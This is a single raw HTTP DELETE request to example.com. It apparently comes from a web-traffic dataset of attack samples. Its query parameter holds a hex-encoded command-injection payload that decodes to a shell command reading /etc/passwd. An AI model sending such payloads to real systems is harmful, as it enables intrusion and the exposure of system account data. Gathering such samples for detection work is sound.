DELETE /?confidentiality=3b20636174202f6574632f7061737377643b HTTP/1.1
Host: example.com
Cache-Control: no-cache
Pragma: no-cache
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14
Cookie: render=heterogeneous; SESSIONID=15d62b72466175c9321270a6ffde7bce56e81de5a6001a8d567f923765bdeff11f53b2d01edf7463b02aa479886ff4d9

